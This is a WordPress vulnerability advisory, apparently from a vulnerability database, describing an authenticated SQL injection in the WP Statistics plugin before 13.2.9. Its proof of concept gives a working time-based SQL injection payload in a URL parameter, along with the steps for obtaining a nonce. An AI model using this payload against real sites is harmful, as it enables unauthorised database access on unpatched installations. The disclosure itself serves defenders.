WordPress Plugin Vulnerabilities
WP Statistics < 13.2.9 - Authenticated SQLi
Description
The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.
Proof of Concept
Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s: http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jordy Versmissen
Submitter
Jordy Versmissen
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-27 (about 1 years ago)
Added
2022-12-27 (about 1 years ago)
Last Updated
2022-12-27 (about 1 years ago)